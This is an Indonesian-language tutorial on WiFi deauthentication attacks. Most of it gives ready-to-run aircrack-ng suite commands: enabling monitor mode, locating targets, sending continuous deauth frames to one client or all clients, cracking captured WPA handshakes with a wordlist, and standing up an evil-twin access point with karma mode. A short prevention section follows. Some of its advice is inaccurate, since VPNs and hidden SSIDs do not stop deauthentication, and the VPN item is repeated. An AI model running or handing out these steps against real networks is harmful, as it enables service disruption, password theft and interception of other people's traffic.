Deauthentication Attack
Pendahuluan
Deauthentication attack adalah jenis serangan denial-of-service (DoS) yang menargetkan jaringan WiFi. Serangan ini bekerja dengan cara mengirimkan paket deauthentication ke perangkat yang terhubung ke jaringan WiFi, sehingga perangkat tersebut terputus dari jaringan.
Cara Kerja Deauthentication Attack
Serangan deauthentication memanfaatkan celah dalam protokol IEEE 802.11, yang merupakan standar untuk jaringan WiFi. Protokol ini memungkinkan perangkat untuk memutuskan koneksi dari jaringan dengan mengirimkan paket deauthentication. Namun, penyerang dapat memanfaatkan fitur ini untuk mengirimkan paket deauthentication palsu, yang menyebabkan perangkat yang sah terputus dari jaringan.
Alat yang Digunakan untuk Melakukan Deauthentication Attack
Ada berbagai alat yang dapat digunakan untuk melakukan serangan deauthentication, antara lain:
- Aireplay-ng: Alat ini adalah bagian dari suite Aircrack-ng, yang merupakan kumpulan alat untuk menguji keamanan jaringan WiFi. Aireplay-ng dapat digunakan untuk mengirimkan paket deauthentication ke perangkat yang terhubung ke jaringan WiFi.
- MDK3: Alat ini juga dapat digunakan untuk mengirimkan paket deauthentication. MDK3 memiliki beberapa fitur tambahan yang tidak dimiliki aireplay-ng, seperti kemampuan untuk mengirimkan paket deauthentication ke beberapa perangkat secara bersamaan.
- Scapy: Alat ini adalah library Python yang dapat digunakan untuk membuat dan mengirimkan paket jaringan. Scapy dapat digunakan untuk membuat paket deauthentication khusus.
Cara Melakukan Deauthentication Attack
1. Setup Monitor Mode
Menggunakan iwconfig
nmcli
iwconfig
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Menggunakan airmon-ng
airmon-ng
airmon-ng check kill # Menghentikan Network Manager (opsional)
airmon-ng start wlan0
2. Mencari Target dengan airodump-ng
airodump-ng wlan0mon
3. Menargetkan Spesifik AP dan Klien
airodump-ng -d "target's BSSID" -c "target's channel number" wlan0mon
airodump-ng -d "target's BSSID" -c "target's channel number" -w "path/dir" wlan0mon
Contoh:
airodump-ng -d 6C:3B:6B:F2:4E:59 -c 10 -w Documents/testwifi wlan0mon
4. Melakukan Serangan Deauthentication
aireplay-ng -0 0 -a AP -c CLIENT wlan0mon
Contoh:
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon # Menargetkan klien tertentu
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon # Menargetkan semua klien
5. Melakukan Crack Sandi
airodump-ng -d "target's BSSID" -c "target's channel number" -w "path/dir" wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt "path.cap"
Contoh:
aircrack-ng -w /usr/share/wordlists/rockyou.txt pentest_test-01.cap
6. Membuat Access Point Palsu dengan airbase-ng
airbase-ng digunakan untuk membuat Access Point palsu (Rogue AP) guna melakukan serangan seperti Evil Twin Attack atau Man-in-the-Middle (MITM).
Sintaks Dasar:
airbase-ng [opsi] -e "SSID" -c "channel" wlan0mon
Contoh:
airbase-ng -e "Free WiFi" -c 6 wlan0mon
-e "Free WiFi"→ Menentukan nama SSID yang akan dipalsukan.-c 6→ Menentukan channel WiFi (sesuai dengan target).wlan0mon→ Interface yang dalam mode monitor.
Opsi Tambahan:
-a <BSSID>→ Menentukan BSSID (opsional, jika ingin meniru BSSID tertentu).--essid "SSID"→ Alternatif untuk menentukan SSID yang dipalsukan.-N→ Menonaktifkan broadcast SSID (hidden SSID).-P→ Mengaktifkan mode "karma attack" untuk menangkap koneksi otomatis dari perangkat yang mencari SSID tertentu.-C <filename>→ Menentukan konfigurasi tambahan untuk AP palsu.
Penjelasan Perintah:
airmon-ng
check kill→ Menghentikan proses yang bisa mengganggu mode monitor.start wlan0→ Mengaktifkan mode monitor pada interfacewlan0.stop wlan0mon→ Mengembalikan interface ke mode normal.
airodump-ng
-d <BSSID>→ Menargetkan Access Point tertentu.-c <channel>→ Memfilter hanya pada channel tertentu.-w <path>→ Menyimpan hasil dalam file untuk analisis lebih lanjut.--encrypt <WEP/WPA/WPA2>→ Memfilter jaringan berdasarkan enkripsi.--essid <SSID>→ Memfilter hanya jaringan dengan SSID tertentu.
aireplay-ng
-0 <count>→ Mode deauthentication attack (0untuk terus-menerus).-a <BSSID>→ Menargetkan Access Point tertentu.-c <Client MAC>→ Menargetkan klien tertentu (opsional, jika dihapus semua klien akan dideauth).
aircrack-ng
-w <wordlist>→ Menentukan file wordlist untuk brute-force.<file.cap>→ File capture yang akan dianalisis.-b <BSSID>→ Menentukan target BSSID tertentu.-e <SSID>→ Menentukan SSID jaringan target secara spesifik.
Mengecek Perangkat Jaringan
nmcli device status # Menampilkan status perangkat jaringan
nmcli connection show # Menampilkan daftar koneksi yang tersedia
nmcli device wifi list # Melihat jaringan Wi-Fi yang terdeteksi
ifconfig # Menampilkan informasi semua interface jaringan
ifconfig wlan0 # Menampilkan informasi detail tentang wlan0
ip a # Alternatif untuk melihat informasi IP dan interface
iwconfig # Melihat status mode jaringan
iw dev # Menampilkan perangkat wireless yang tersedia
iw wlan0 link # Menampilkan informasi koneksi saat ini
iw wlan0 scan # Melakukan pemindaian jaringan Wi-Fi di sekitar
ethtool wlan0 # Menampilkan informasi detail perangkat jaringan
arp-scan --localnet # Memindai semua perangkat dalam jaringan lokal
rfkill list # Melihat status perangkat yang bisa dinonaktifkan
rfkill unblock all # Mengaktifkan kembali semua perangkat yang diblokir
Cara Mencegah Deauthentication Attack
Ada beberapa cara untuk mencegah serangan deauthentication, antara lain:
- Menggunakan WPA3: WPA3 adalah protokol keamanan WiFi terbaru yang lebih aman daripada WPA2. WPA3 menggunakan enkripsi yang lebih kuat dan memiliki fitur-fitur keamanan tambahan yang dapat membantu mencegah serangan deauthentication.
- Mengaktifkan fitur manajemen frame: Fitur ini dapat membantu mencegah serangan deauthentication dengan cara memblokir paket deauthentication palsu.
- Menggunakan VPN: VPN dapat mengenkripsi lalu lintas internet Anda dan menyembunyikan alamat IP Anda. Hal ini dapat membantu melindungi Anda dari serangan deauthentication.
- Memperbarui firmware router: Memperbarui firmware router Anda secara teratur dapat membantu memastikan bahwa router Anda memiliki patch keamanan terbaru.
- Menyembunyikan SSID WiFi: Dengan menyembunyikan SSID, hanya perangkat yang mengetahui nama jaringan yang dapat menghubungkan diri.
- Menggunakan VPN: VPN akan mengenkripsi lalu lintas internet Anda sehingga lebih sulit bagi penyerang untuk melancarkan serangan.
Kesimpulan
Deauthentication attack adalah serangan yang meresahkan yang dapat mengganggu koneksi internet Anda dan bahkan mencuri informasi sensitif Anda. Namun, ada beberapa cara untuk mencegah serangan ini. Dengan mengikuti tips di atas, Anda dapat membantu melindungi diri Anda dari serangan deauthentication.
Catatan: Informasi yang diberikan di sini hanya untuk tujuan pendidikan. Saya tidak bertanggung jawab atas penyalahgunaan informasi ini.
Sumber:
Artikel ini disusun berdasarkan referensi dari: